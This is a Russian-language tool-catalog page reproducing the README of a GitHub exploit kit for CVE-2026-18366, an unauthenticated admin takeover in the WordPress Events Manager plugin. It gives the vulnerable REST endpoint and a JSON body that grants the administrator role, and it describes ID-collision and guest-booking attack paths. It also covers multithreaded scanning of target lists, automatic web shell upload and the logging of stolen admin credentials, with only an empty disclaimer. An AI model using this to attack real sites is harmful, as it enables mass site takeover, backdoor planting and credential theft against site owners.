Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 — Неаутентифицированное повышение привилегий до администратора | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-18366
Повышение привилегийСканеры веб-уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатация
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 — Неаутентифицированное повышение привилегий до администратора

Репозиторий
2251 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-18366

Events Manager < 7.4.1 — Неаутентифицированное повышение привилегий до администратора

CVE CVSS WordPress

Typing SVG


🔗 Будьте в курсе

Telegram

Актуальные zero-day уязвимости, эксплойты и исследования в области безопасности

Telegram Channel


📋 Обзор уязвимости

АтрибутДетали
CVE IDCVE-2026-18366
Серьёзность🔴 КРИТИЧЕСКИЙ (CVSS 9.8)
ПлагинEvents Manager для WordPress
Затронутые версии< 7.4.1
Тип уязвимостиНеаутентифицированное повышение привилегий
Вектор атакиСеть
Требуется аутентификацияНет

🔍 Техническое описание

Анализ первопричины

Уязвимость находится в EM\Archetypes::map_meta_cap внутри classes/em-archetypes.php. Плагин некорректно ограничивает область сопоставления прав (capability mapping), а именно:

  1. Воспринимает ЛЮБОЙ ID объекта как ID записи (post)
  2. Если запись является CPT event или location, он обнуляет $caps = []
  3. Никогда не восстанавливает права для edit_user, delete_user или promote_user
  4. Пустые права → has_cap() возвращает true, в том числе для пользователя 0 (гостя)

Вектор атаки

POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Условие: {id} должен совпадать с wp_posts.ID записи CPT event или location.

⚠️ Неаутентифицированный REST API не требует nonce (нет cookie авторизованного пользователя).

Эксплуатация через гостевые бронирования

Гостевые бронирования (dbem_bookings_anonymous=1 по умолчанию) создают реальных пользователей WP, что позволяет форсировать коллизию. Nonce бронирования находится в открытом доступе в формах событий.


🚀 Использование

Требования

pip install aiohttp

Быстрый старт

python CVE-2026-18366.py

Скрипт запросит следующие параметры:

  • list → путь к файлу со списком целей (по умолчанию: list.txt)
  • speed → количество одновременных потоков (по умолчанию: 10)

Параметры командной строки

python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
ОпцияОписание
-l, --listПуть к файлу с URL целей
-s, --speedКоличество одновременных потоков (1-200)
--timeoutТайм-аут запроса в секундах (по умолчанию: 20)

Формат списка целей

Создайте файл list.txt с одной целью в каждой строке:

https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Вывод

Вывод в консоль

[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

Файл с результатами

Успешно скомпрометированные цели сохраняются в файл adminS.txt:

https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Схема эксплуатации

┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Возможности

  • Асинхронная архитектура → высокопроизводительное параллельное сканирование
  • Два пути атаки → коллизия ID + эксплуатация гостевых бронирований
  • Автоматическая загрузка шелла → развёртывание веб-шелла в плагине/теме
  • Определение версии → автоматическое определение уязвимой версии
  • Умное перечисление имён пользователей → несколько техник перечисления
  • Проверка входа → валидация через cookie + XML-RPC
  • Повышение привилегий → автоматическое повышение до администратора

📁 Структура файлов

├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Отказ от ответственности

Скачать инструмент